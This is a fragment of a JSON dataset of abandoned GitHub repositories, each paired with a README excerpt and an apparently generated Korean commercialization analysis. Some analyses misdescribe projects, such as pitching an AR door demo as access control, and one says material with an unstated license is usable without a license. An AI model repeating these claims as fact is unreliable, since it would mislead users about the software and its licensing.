als","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"AlexiaJM/score_sde_fast_sampling","github_url":"https://github.com/AlexiaJM/score_sde_fast_sampling","stars":13,"language":"Python","license":"unknown","abandonment_months":55,"description":"# AlexiaJM/score_sde_fast_sampling 분석\n\n## 왜 보물인가\n복잡한 이미지 생성 작업을 매우 빠르게 처리할 수 있는 기술로, 생성형 AI 서비스의 응답 속도를 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 이미지 생성 SaaS**: 사용자가 텍스트로 설명한 그림을 신속하게 만들어주는 웹 서비스 (예: ","readme_excerpt":"# Gotta Go Fast When Generating Data with Score-Based Models\n\nThis repo contains the official implementation for the paper [Gotta Go Fast When Generating Data with Score-Based Models](https://arxiv.org/abs/2105.14080), which shows how to generate data as fast as possible with score-based models using a well-designed SDE solver. See the [blog post](https://ajolicoeur.wordpress.com/gotta-go-fast-with-score-based-models/) for more details.\n\n<p align=\"center\">\n  <img src=\"https://i.kym-cdn.com/photos/images/newsfeed/000/615/826/8ba.gif\">\n</p>\n\n--------------------\n\nThis code is a heavy modification of the [Generative Modeling through Stochastic Differential Equations repository](https://github.com/yang-song/score_sde).\n\n## 2021-09-21: Using the GottaGoFast sampler in Torch\nIf you want the PyTorch version, please use https://github.com/yang-song/score_sde_pytorch/blob/main/sde_lib.py along with my modified version of https://github.com/yang-song/score_sde_pytorch/blob/main/sampling.py which","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"Microsoft/CodeTalk","github_url":"https://github.com/Microsoft/CodeTalk","stars":6,"language":"C#","license":"MIT","abandonment_months":45,"description":"# Microsoft/CodeTalk 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 이 도구는 프로그래머가 작성한 복잡한 컴퓨터 코드를 일반인도 이해할 수 있도록 설명해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 코드 리뷰 플랫폼이 이 기술을 탑재하여 팀원들이 서로의 코드를 쉽게 이해하고 피드백하는 서비스\n2. **내부 업무 ","readme_excerpt":"[![Join the chat at https://gitter.im/Microsoft/CodeTalk](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Microsoft/CodeTalk?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)   [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/Microsoft/CodeTalk/blob/master/LICENSE)  \n  \n# CodeTalk\nCode Talk is a step towards making programming IDEs more accessible. The plugin currently concentrates on three main aspects of Programming:\n1. Glanceability\n2. Real-Time Error information \n3. Accessible Debugging\n\nCodeTalk is currently only available for Visual Studio running in Windows for C# and Python languages. We are working very hard towards bringing it to more platforms and IDEs. Stay tuned.\n\n[Video Demo of CodeTalk.](http://www.youtube.com/watch?v=ttkNYaPwn6E)\n\n# Download CodeTalk\nDownload the latest [VSIX installer](https://github.com/Microsoft/CodeTalk/releases/download/v0.8.0/Microsoft.CodeTalk.0.8.0.vsix)  \nTo view all","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"OpnTec/open-event-scraper","github_url":"https://github.com/OpnTec/open-event-scraper","stars":12,"language":"Python","license":"MIT","abandonment_months":121,"description":"# OpnTec/open-event-scraper 분석 리포트\n\n## 왜 보물인가\n온라인에 흩어져 있는 행사 정보를 자동으로 모아주는 도구로, 행사 정보를 수집하는 업체들의 시간과 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **행사 정보 검색 서비스**: 티켓팅 회사나 행사 앱이 전국의 콘서트, 전시회, 세미나 정보를 자동으로 수집해","readme_excerpt":"# open-event-scraper\n\nGoogle spreadsheet parsing for FOSSASIA 2016\n\n## setup\n\n```shell\npip install -r requirements.txt\n./run.sh\n```\n\n## How deploy to heroku\nInstall heroku\n```\n$ sudo apt-get install heroku\n```\n\nAdd heroku branch to git\n```\n$ heroku git:remote -a ots-2016\n```\n\nDeploy changes to server\n```\n$ git push heroku master\n```\n\n## License\n\n[MIT](./LICENSE)\n\n\n","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"xulayen/webpack","github_url":"https://github.com/xulayen/webpack","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":103,"description":"# xulayen/webpack 분석\n\n## 왜 보물인가\n웹사이트를 빠르게 로딩하게 해주는 핵심 도구의 커스텀 버전으로, 웹 개발자들의 작업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 개발자를 위한 프로젝트 빌드 최적화 플랫폼 (드래그앤드롭으로 설정 관리)\n- **내부 업무 도구**: 대기업의 웹 개발팀이 사","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://github.com/webpack/webpack\">\n    <img width=\"200\" heigth=\"200\" src=\"https://webpack.js.org/assets/icon-square-big.svg\">\n  </a>\n  <br>\n  <br>\n\n[![npm][npm]][npm-url]\n\n[![node][node]][node-url]\n[![deps][deps]][deps-url]\n[![tests][tests]][tests-url]\n[![builds][builds]][builds-url]\n[![coverage][cover]][cover-url]\n[![licenses][licenses]][licenses-url]\n\n  <br>\n\t<a href=\"https://npmjs.com/package/webpack\">\n\t\t<img src=\"https://img.shields.io/npm/dm/webpack.svg\">\n\t</a>\n\t<a href=\"https://opencollective.com/webpack#backer\">\n\t\t<img src=\"https://opencollective.com/webpack/backers/badge.svg\">\n\t</a>\n\t<a href=\"https://opencollective.com/webpack#sponsors\">\n\t\t<img src=\"https://opencollective.com/webpack/sponsors/badge.svg\">\n\t</a>\n\t<a href=\"https://github.com/webpack/webpack/graphs/contributors\">\n\t\t<img src=\"https://img.shields.io/github/contributors/webpack/webpack.svg\">\n\t</a>\n\t<a href=\"https://gitter.im/webpack/webpack\">\n\t\t<img src=\"https://badges.gitter.im/webpa","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"microsoft/bayesianize","github_url":"https://github.com/microsoft/bayesianize","stars":9,"language":"Python","license":"MIT","abandonment_months":25,"description":"# Microsoft Bayesianize 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터 분석을 통계학적으로 더 정확하게 만들어주는 도구로, 의사결정이 중요한 기업들이 실수를 줄이는 데 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융/투자 분석 SaaS**\n- 펀드 매니저나 개인 투자자가 시장 변동성을 더 정확히 예측하는 구독 서비스\n\n**2. ","readme_excerpt":"# Bayesianize: a Bayesian neural network wrapper in pytorch\n\nBayesianize is a lightweight Bayesian neural network (BNN) wrapper in pytorch. The overall goal is to allow for easy conversion of neural networks in existing scripts to BNNs with minimal changes to the code. \n\nCurrently the wrapper supports the following uncertainty estimation methods for feed-forward neural networks and convnets:\n\n* Mean-field variational inference (MFVI): variational inference with fully factorised Gaussian (FFG) approximation.\n* Variational inference with full-covariance Gaussian approximation (for each layer).\n* Variational inference with inducing weights: each of the layer is augmented with a small matrix of inducing weights, then MFVI is performed in the inducing weight space.\n* Ensemble in inducing weight space: same augmentation as above, but with ensembles in the inducing weight space.\n\n## Usage\n\nThe main workhorse of our library is the `bayesianize_` function.\nIt can be applied to a pytorch neural ","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"batuhankrbb/coin_dino","github_url":"https://github.com/batuhankrbb/coin_dino","stars":9,"language":"Dart","license":"unknown","abandonment_months":46,"description":"# coin_dino 저장소 분석\n\n## 왜 보물인가\n암호화폐 가격 변동을 자동으로 추적하고 분석해주는 도구로, 투자 초보자도 시장 동향을 쉽게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 투자 플랫폼 SaaS**: 실시간 가격 알림과 수익성 분석을 제공하는 구독형 투자 보조 서비스\n2. **거래소 내부 도구**: 암호화폐 거래소의 고","readme_excerpt":"# coin_dino\n\nBig cryptocurrency application that shows you details about cryptocurrencies and many other things. Made with Clean Code + Layered Architecture. State management: MobX + GetIt\n\nAvailable platforms: iOS, Android, iPadOS\n\n## Features\n\nSome of the features that Coin Dino has:\n\n- Local Notifications\n- Theme (Dark, Light)\n- Localization (Turkish,English, Spanish, French)\n- Advertisement (Admob Banner and interstitial)\n- In-App Purchase\n- Local Database (Hive)\n- Remote Database (API, Dio)\n- Responsive User Interface (Tablets, iPad, iPhone, Android phones)\n- Multi Platform (iOS, Android)\n- Share Activity\n- Copy Clipboard\n- User Preference Save (Theme, Base Currency etc.)\n- Graph (fl_chart)\n- Email Sending\n- Click to open website (url_launcher)\n- In App Review\n- Pull to refresh\n\n## Screenshots\n\n<img src=\"https://user-images.githubusercontent.com/59976112/131339212-7dea64f7-9e96-46ae-be55-09e023a80df1.png\" alt=\"App Screenshot 1\" width=\"200\" height=\"430\"> \n<img src=\"https://user-ima","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"akarnokd/RxJava2Jdk8Interop","github_url":"https://github.com/akarnokd/RxJava2Jdk8Interop","stars":16,"language":"Java","license":"Apache-2.0","abandonment_months":78,"description":"# RxJava2Jdk8Interop 평가 보고서\n\n## 왜 보물인가\n자바의 두 가지 인기 있는 프로그래밍 방식을 연결해주는 다리 역할을 해서, 오래된 시스템과 새로운 시스템이 함께 작동할 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기존 금융·결제 시스템을 클라우드 기반 구독 서비스로 현대화할 때 호환성을 보장하는 미들","readme_excerpt":"# RxJavaJdk8Interop\n\n## :warning: Discontinued\n\nThe features of this library (and more) have been integrated into *RxJava 3* proper starting with version **3.0.0-RC7**.\n\n----------\n\n<a href='https://travis-ci.org/akarnokd/RxJavaJdk8Interop/builds'><img src='https://travis-ci.org/akarnokd/RxJavaJdk8Interop.svg?branch=3.x'></a>\n[![codecov.io](http://codecov.io/github/akarnokd/RxJavaJdk8Interop/coverage.svg?branch=3.x)](http://codecov.io/github/akarnokd/RxJavaJdk8Interop?branch=3.x)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.akarnokd/rxjava3-jdk8-interop/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.github.akarnokd/rxjava3-jdk8-interop)\n\nRxJava 3.x: [![RxJava 3.x](https://maven-badges.herokuapp.com/maven-central/io.reactivex.rxjava3/rxjava/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.reactivex.rxjava3/rxjava)\n\nRxJava 3 interop library for supporting Java 8 features such as Optional, Stream and CompletableFuture.\n\n# R","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"lawl/NoiseTorch","github_url":"https://github.com/lawl/NoiseTorch","stars":28,"language":"","license":"unknown","abandonment_months":49,"description":"# NoiseTorch 상용화 분석\n\n## 왜 보물인가\n음성 통화 중 배경 소음을 자동으로 제거해주는 기술로, 재택근무와 온라인 회의가 일상화된 시대에 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **화상회의 SaaS**: Zoom, Google Meet 같은 화상회의 플랫폼에 통합하여 음질 개선 기능 제공\n2. **콜센터 운영 도구**: 고객 ","readme_excerpt":"# NoiseTorch\nProject dead (security breach)\n\n\nI recommend against using any community forks either.\n\nIf you currently have it installed, it can be uninstalled with:\n\n```\nrm ~/.local/bin/noisetorch\nrm ~/.local/share/applications/noisetorch.desktop\nrm ~/.local/share/icons/hicolor/256x256/apps/noisetorch.png\n```\n","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"Minecodecraft/ARDoor","github_url":"https://github.com/Minecodecraft/ARDoor","stars":14,"language":"Swift","license":"MIT","abandonment_months":104,"description":"# ARDoor 저장소 분석\n\n## 왜 보물인가\n현실 세계에 디지털 정보를 겹쳐 보여주는 증강현실 기술을 문(Door)에 적용하여, 스마트 출입 관리 시스템을 만들 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 SaaS 서비스**\n사무실, 회의실, 보안 구역의 문에 설치하여 직원이 스마트폰으로 출입 현황을 확인하고 관리할 수 있는 ","readme_excerpt":"## ARDoor\nUse AR technology to create a free and accessible door. Using ARKit, Swift 4.0\n\n## Showcase\n![GIF](https://github.com/Minecodecraft/ARDoor/blob/master/Showcase.gif)\n\n## Tutorial Article (Chinese)\n- http://www.jianshu.com/p/ea679b7c80bc\n\n## Author\n**Minecode**\nJianshu:[Minecode](http://www.jianshu.com/u/4ee7974ebfa5)\nCSDN Blog:[Minecode](http://blog.csdn.net/b735098742)\n","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"dzld00/pytorch-manifold-matching","github_url":"https://github.com/dzld00/pytorch-manifold-matching","stars":7,"language":"Python","license":"unknown","abandonment_months":39,"description":"# pytorch-manifold-matching 분석\n\n## 왜 보물인가\n복잡한 데이터 패턴을 자동으로 찾아내고 비교할 수 있는 기술로, 이미지 인식, 의료 진단, 제품 품질 검사 등 다양한 분야에서 인공지능 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 분석 SaaS**: 엑스레이나 MRI 이미지를 자동으로 비교하여 ","readme_excerpt":"# Manifold Matching via Deep Metric Learning for Generative Modeling\nA Pytorch implementation of \"Manifold Matching via Deep Metric Learning for Generative Modeling\" (ICCV 2021). \n<p align=\"center\">\n<img src=\"/images/noise_sphere.gif\" align=\"middle\" width=\"500\">\n</p>\nPaper: https://arxiv.org/abs/2106.10777\n<p align=\"center\">\n<img src=\"/images/pipeline2.png\" align=\"middle\">\n</p>\n\n# Objective functions\nObjective for metric learning:\n```\ntriplet_loss = triplet_(ml_real_out,ml_real_out_shuffle,ml_fake_out_shuffle)\n```\nObjective for manifold matching with learned metric:\n```\ng_loss = p_dist + c_dist \n```\nwhere \n```\nml_real_out = netML(real_img) # real data\nml_fake_out = netML(fake_img) # generated data \n\n# shuffle in batch\nr1=torch.randperm(batch_size)\nr2=torch.randperm(batch_size)\nml_real_out_shuffle = ml_real_out[r1[:, None]].view(ml_real_out.shape[0],ml_real_out.shape[-1])\nml_fake_out_shuffle = ml_fake_out[r2[:, None]].view(ml_fake_out.shape[0],ml_fake_out.shape[-1])\n\n# pairwise distance","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"vlean/MagicMirror","github_url":"https://github.com/vlean/MagicMirror","stars":20,"language":"","license":"MIT","abandonment_months":70,"description":"# MagicMirror 상용화 분석\n\n## 왜 보물인가\n일반 거울에 날씨, 뉴스, 일정 같은 유용한 정보를 띄워주는 스마트 거울 플랫폼으로, 누구나 쉽게 자신만의 맞춤형 정보 거울을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트 거울 구독 서비스 - 클라우드 기반 날씨, 뉴스, 일정 데이터를 개인 거울에 자동 동기화\n","readme_excerpt":"# Make a MagicMirror\nlet's make a MagicMirror\n\n[![Page Views Count](https://badges.toozhao.com/badges/01EH4NQ1QAMAHTA8GCF37MEKEB/green.svg)](https://badges.toozhao.com/badges/01EH4NQ1QAMAHTA8GCF37MEKEB/green.svg \"Get your own page views count badge on badges.toozhao.com\")\n\n## 0x00 材料准备\n\n下面的材料都可以万能的淘宝里找到，基础设备上需要用到：\n\n- [x] 树莓派3b\n- [x] class 10 mini sd内存卡  \n- [x] usb mini手机充电线 (普通的手机充电线都可以)\n- [x] 散热小风扇 or 散热片  (选用的`散热片`，但是整体密封后，散热效果差了些)\n- [x] 屏幕驱动板/液晶屏/屏幕电源  (选用的`BOE N41屏幕`)\n- [x] 原子镜 or 单透贴膜 (选用的`原子镜`，成像效果更好些)\n\n为了让魔镜集成更多的功能，可以配置一些传感器/扩展。\n\n- [x] 温湿度传感器 DHT11\n- [x] 声音传感器  (通过高低电平确认是否有声音，敏感度可调)\n- [x] 蜂鸣器\n- [x] 时钟  DS1302 (树莓派没有内置的时钟，未联网时，时间不准，外接时钟保证时间的准确)\n- [ ] 噪声传感器 (可以获取到当前声音分贝)\n- [ ] 人体距离感应器  (需要在外框的正面开孔，没有集成)\n- [ ] 摄像头 (也需要在外框正面开孔，没做集成)\n\n更多的传感器可以去淘。不过这样还是有些不够智能，亚马逊的`echo`，阿里的`天猫精灵`都做到了语音交互功能，借助语音交互我们可以做更多的事情了:播放音乐、事件提醒、语音聊天、命令控制等等。提供自然语言处理服务的有很多，[百度语音识别](http://yuyin.baidu.com/asr)、[腾讯智能语音服务](https://cloud.tencent.com/product/aai)、[讯飞](http://www.xfyun.cn/sdk/dispatcher)等等。百度的语音服务基本都是在线","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"danvega/spring-one-2021","github_url":"https://github.com/danvega/spring-one-2021","stars":7,"language":"Vue","license":"unknown","abandonment_months":58,"description":"# spring-one-2021 저장소 분석\n\n## 왜 보물인가\nSpring Framework라는 업계 표준 기술을 활용한 실제 프로젝트 예제이므로, 웹 애플리케이션을 만드는 회사들이 개발 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 관리 웹사이트나 협업 플랫폼의 기술 기반으로 활용\n- **내부 업무 ","readme_excerpt":"# Spring One 2021\n\nThis is a collection of code and resources for my presentation at SpringOne 2021 title [Full-Stack Development with Spring Boot and VueJS](https://springone.io/account/talks/165).\n\nAre you interested in building full-stack web applications with Spring Boot and VueJS? If so, this session is going to give you everything you need to get started. First, we’ll dive into some of the challenges of building full-stack applications. Next, we’ll look at some different approaches you can take depending on the types of applications you're building along with the makeup of your team. Finally, we’ll spend most of the session building a sample application together so that when you leave this session, you’ll have everything you need to start building full-stack web applications with Spring Boot and VueJS.\n## Slide Deck\n\n  [FullStackJava](./FullStackJavaDevelopment.pdf)\n## Code\n\n- [Progressive Vue](./progressive-vue)\n- [Monolith](./monolith)\n- [Ice Cream Store - Monolith](./ice-cream","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"SwiftKickMobile/SwiftAutoLayout","github_url":"https://github.com/SwiftKickMobile/SwiftAutoLayout","stars":13,"language":"Swift","license":"MIT","abandonment_months":91,"description":"# SwiftAutoLayout 보물지도\n\n## 왜 보물인가\niPhone 앱 개발자들이 화면 레이아웃을 쉽게 만들 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: iPhone 앱 개발 플랫폼에 내장하여 개발자들이 더 빠르게 앱을 만들도록 지원\n2. **내부 업무 도구**: 앱 개발사의 개발팀이 자체 앱 제작 시간을 ","readme_excerpt":"# SwiftAutoLayout\n\n[![Twitter: @TimothyMoose](https://img.shields.io/badge/contact-@TimothyMoose-blue.svg?style=flat)](https://twitter.com/TimothyMoose)\n[![Version](https://img.shields.io/cocoapods/v/SwiftAutoLayout.svg?style=flat)](http://cocoadocs.org/docsets/SwiftAutoLayout)\n[![License](https://img.shields.io/cocoapods/l/SwiftAutoLayout.svg?style=flat)](http://cocoadocs.org/docsets/SwiftAutoLayout)\n[![Platform](https://img.shields.io/cocoapods/p/SwiftAutoLayout.svg?style=flat)](http://cocoadocs.org/docsets/SwiftAutoLayout)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\n<p align=\"center\">\n  <img src=\"./Design/SwiftAutoLayoutBanner.gif\" />\n</p>\n\n## Overview\n\nSwiftAutoLayout helps you write AutoLayout constraints as consisely, Swiftly, and as natively as possible. Constrain `UIView` and `UILayoutGuide`s interchangeably with a familiar syntax named to match their native properties. This library purp","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"dtolnay/rust-faq","github_url":"https://github.com/dtolnay/rust-faq","stars":7,"language":"","license":"Apache-2.0","abandonment_months":50,"description":"# Rust-FAQ 저장소 분석\n\n## 왜 보물인가\nRust라는 프로그래밍 언어의 자주 묻는 질문들을 정리한 가이드로, 프로그래머들이 반복되는 질문에 답하는 시간을 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Rust 개발자를 위한 온라인 교육 플랫폼으로 구독형 심화 코스와 함께 제공\n2. **내부 업무 도구**: IT 회","readme_excerpt":"## Frequently Asked Questions\n\nThis page exists to answer common questions about the Rust programming language. It is not a complete guide to the language, nor is it a tool for teaching the language. It is a reference to answer oft-repeated questions people in the Rust community encounter, and to clarify the reasoning behind some of Rust's design decisions.\n\nIf there is some common or important question you feel is wrongly left unanswered here, please open a GitHub issue against this repository!\n\n*Most of this content used to live in the rust-lang/rust repository, then a\ndedicated FAQ page on the website. It was dropped during the website redesign of\nlate 2018. I have resurrected it here because many of these questions continue\nto be asked frequently.*\n\n<br><br>\n\n## Table of Contents\n\n- [The Rust Project](#the-rust-project)\n- [Performance](#performance)\n- [Syntax](#syntax)\n- [Numerics](#numerics)\n- [Strings](#strings)\n- [Collections](#collections)\n- [Ownership](#ownership)\n- [Lifetimes","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"lencx/vite-plugin-rsw","github_url":"https://github.com/lencx/vite-plugin-rsw","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":36,"description":"# vite-plugin-rsw 분석\n\n## 왜 보물인가\n웹사이트를 빠르게 만들고 성능을 최적화하는 개발 도구로, 프로그래머들의 작업 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 업무 관리 도구(프로젝트 관리, CRM 등)의 로딩 속도를 개선하여 사용자 경험 향상\n2. **내부 업무 도구**: 기업의 대시","readme_excerpt":"# vite-plugin-rsw\n\n> wasm-pack plugin for Vite\n\n[![npm](https://img.shields.io/npm/v/vite-plugin-rsw.svg)](https://www.npmjs.com/package/vite-plugin-rsw)\n[![npm downloads](https://img.shields.io/npm/dm/vite-plugin-rsw.svg)](https://npmjs.org/package/vite-plugin-rsw)\n[![vite version](https://img.shields.io/badge/Vite-^2.0.0-000000?style=flat&labelColor=646cff)](https://github.com/vitejs/vite)\n[![chat](https://img.shields.io/badge/chat-discord-blue?style=flat&logo=discord)](https://discord.gg/euyYWXTwmk)\n\n[![awesome-rsw](./assets/awesome-rsw.svg)](https://github.com/lencx/awesome-rsw)\n[![Rust](https://img.shields.io/badge/-Rust-DEA584?style=flat&logo=rust&logoColor=000000)](https://www.rust-lang.org)\n[![WebAssembly](https://img.shields.io/badge/-WebAssembly-654FF0?style=flat&logo=webassembly&logoColor=ffffff)](https://webassembly.org)\n\n|rsw version|vite version|\n|---|---|\n| >= `2.0.0`| >= `2.8.0`|\n| >= `1.8.0`| >= `2.4.0`|\n|`1.7.0`|`2.0.0 ~ 2.3.8`|\n\n## Features\n\n- `HMR`\n- `Friendly error","composite_score":0.5006,"license_safety_tag":"safe"},{"name":"cvg/visloc-iccv2021","github_url":"https://github.com/cvg/visloc-iccv2021","stars":5,"language":"","license":"NOASSERTION","abandonment_months":32,"description":"# cvg/visloc-iccv2021 보물 평가\n\n## 왜 보물인가\n사진만 가지고도 정확히 어디에 있는지 찾아내는 기술로, 드론, 자율주행차, 로봇 등 위치 파악이 중요한 산업에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 건설사/부동산 회사가 드론 사진으로 현장을 자동으로 분석하고 위치를 파악하는 웹 플랫폼\n2. **내부 업","readme_excerpt":"# ETH-MS localization dataset\n\n<img src=\"assets/logos.svg\" width=\"40%\"/>\n\nThe [Computer Vision & Geometry Group at ETH Zurich](http://www.cvg.ethz.ch/) and the [Microsoft Mixed Reality & AI Lab Zurich](https://www.microsoft.com/en-us/research/lab/mixed-reality-ai-zurich/) introduce a new dataset for visual localization with a focus on Augmented Reality scenarios. The data covers day & night illumination changes, large indoor & outdoor environments, and different sensor configurations for handheld and head-mounted devices.\n\n> [!IMPORTANT]\n> This is a now-deprecated preview of our [follow-up and much larger LaMAR dataset](https://lamar.ethz.ch/), of which this preview is only a small subset. LaMAR includes lidar point clouds and meshes and high-frequency HoloLens & phone sensor streams that include images, depth, IMU, etc. Please use LaMAR instead of this preview, which was released for the [ICCV 2021 workshop on Long-Term Visual Localization under Changing Conditions](https://sites.goog","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"samrath2007/kyoto.nvim","github_url":"https://github.com/samrath2007/kyoto.nvim","stars":10,"language":"Lua","license":"GPL-2.0","abandonment_months":27,"description":"# kyoto.nvim 상업화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 편집 도구를 더 아름답고 효율적으로 만드는 디자인 테마로, 사용자 경험 개선을 통해 생산성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS 플랫폼**: 클라우드 기반 코딩 환경(예: GitHub Codespaces 유사 서비스)에 내장된 기본 테마","readme_excerpt":"<h1 align=\"center\">🦚 kyoto.nvim</h1>\n\n<p align=\"center\">kyoto.nvim is a fast ⚡, functional, beautiful, and highly customizable neovim configuration</p>\n\n### Installation\n\nFind an [installation guide here](https://github.com/samrath2007/kyoto.nvim/wiki/Installation).\n\n## Features\n\n- LSP Support (with Autocomplete)\n- Ergonomic keybinds\n- Blazing Fast File Explorer\n- Really customizable (seriously, you should check it out)\n\n## Screenshots\n\n<img src=\"./assets/screenshots/ss1.png\" alt=\"\">\n<img src=\"./assets/screenshots/ss2.png\" alt=\"\">\n\n## Supported Languages\n\n### LSP\n\nYou can find a list of supported languages [here](https://github.com/kabouzeid/nvim-lspinstall/tree/main/lua/lspinstall/servers). To install any of them run\n\n```\n:LspInstall <language server name>\n```\n\n## Notable Plugins\n\n- nvim-tree.lua\n- lspsaga.nvim\n- nvim-base16.lua\n- dashboard-nvim\n- telescope.nvim\n- nvim-bufferline.lua\n- lazygit\n- feline.nvim\n\n### Core contributors\n- samrath2007\n- itscarlosecp\n- Pyther99\n","composite_score":0.5006,"license_safety_tag":"restricted"},{"name":"jyash97/cra-to-vite","github_url":"https://github.com/jyash97/cra-to-vite","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":51,"description":"# cra-to-vite 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션 개발 도구를 구형에서 신형으로 쉽게 전환해주는 자동화 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 에이전시**: 기존 클라이언트 프로젝트를 빠르게 현대화하는 컨설팅 서비스로 판매\n2. **개발사 내부 도구**: 수십 개의 레거시 프로젝트를 일괄 업그레이드하는 자동화 솔루","readme_excerpt":"\n\n# cra-to-vite ⚡️ \n\n## Motivation\nI wanted fast development workflow in create react app and `Vite` seems to solve the issue.\n\n`Vite` expects react components filename to have extension `jsx` which can be time consuming to do manually. I created this tool to automatically convert `.js` files to `.jsx`, adds all dependencies and config file.\n\n## Demo\n\n![cra-to-vite-final](https://user-images.githubusercontent.com/22376783/120222624-dc60a380-c25d-11eb-9dd9-4727a9cb4817.gif)\n\n## Install\n\n```\nnpm i -g cra-to-vite\n```\n\n## Usage\n\n```\ncra-to-vite\n```\nOr \n\nIf not installed globally use `npx`\n\n```\nnpx cra-to-vite\n```\n\n### Generated scripts\n\n#### For development\n\n```\nyarn vite:start\n```\n\n#### For Build\n```\nyarn vite:build\n```\n## Features Supported\n- Adds config based on react version\n- Add dev dependencies\n- File conversion\n- Moving html to root\n- Absolute path support ( Coming soon )\n\n## Performance\nConverted `~140` files in less than a minute.\n","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"pyladies-brazil/introducao-python","github_url":"https://github.com/pyladies-brazil/introducao-python","stars":6,"language":"","license":"NOASSERTION","abandonment_months":32,"description":"# pyladies-brazil/introducao-python 분석\n\n## 왜 보물인가\n파이썬 초보자를 위한 체계적인 교육 콘텐츠로, 비영리 커뮤니티의 신뢰성 있는 학습 자료를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 국내 파이썬 입문 강좌용 교재로 라이선스 없이 활용 가능\n2. **기업 신입 교육 프로그램**: 개발팀 온","readme_excerpt":"# Introdução a Python: para mulheres que sabem programar em outra linguagem\n\n###### tags: `Python 3` `Sintax` `Básico`\n\nOlá, PyLady! Seja bem-vinda ao repositório do grupo de estudo \"Introdução a Python\", aqui você encontrará todos os materiais produzidos para incentivar o aprendizado de Python (ebook, slides, série de vídeos e exercícios). Isso tudo foi organizado por muitas mentes e mãos do PyLadies Brasil :heart:\n\nO público alvo desse material são pessoas que sabem programar em outra linguagem e precisam de uma mãozinha para aprender a sintaxe de Python. Nós não tratamos aqui sobre pensamento computacional ou lógica de programação.\n:rocket:\n\n**Sumário**\n1. [e-book](#e-book-ledger):\n    - [Instalação](#instalação)\n    - [Rodando o e-book](#rodando-o-e-book)\n2. [Slides](#slides-dvd)\n3. [Série de vídeos](#série-de-vídeos-clapper)\n4. [Lista de exercícios](#lista-de-exercícios-female-technologist)\n5. [Contribuidoras](#heart-orange_heart-yellow_heart-contribuidoras-green_heart-blue_heart-","composite_score":0.5006,"license_safety_tag":"unknown"},{"name":"DrewDahlman/dockerize-all-the-things","github_url":"https://github.com/DrewDahlman/dockerize-all-the-things","stars":14,"language":"PHP","license":"MIT","abandonment_months":86,"description":"# DrewDahlman/dockerize-all-the-things 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 설치 과정을 자동화해주는 도구로, 개발자들이 설정에 드는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객이 자신의 서버에 소프트웨어를 빠르게 배포할 수 있는 자동 설치 서비스 제공\n- **내부 업무 도","readme_excerpt":"# Dockerize All The Things\nMake your life easier by using containers for everything. This repo will walk through adding docker to your workflow and reducing the need to ever install deps ( Gems, Node Modules, etc ) on your system but instead rely on Docker for all of that. No more worrying about an update to osX to break all of your applications, because it's in a container you are free to just work.\n\n## Intro\nYou know what is awful? Picking up a project that is using outdated versions that differ from your system. We have tools for that ( rbenv, RVM, NVM ) which help with this but you can still run into weird issues where even still things just don't work and you wind up spinning your wheels trying to get things to install and running before you can even start dev.\n\nThe purpose of this project is to show how radical using containers is and how you can avoid ever having to install dependencies on your system beyond the core essentials for 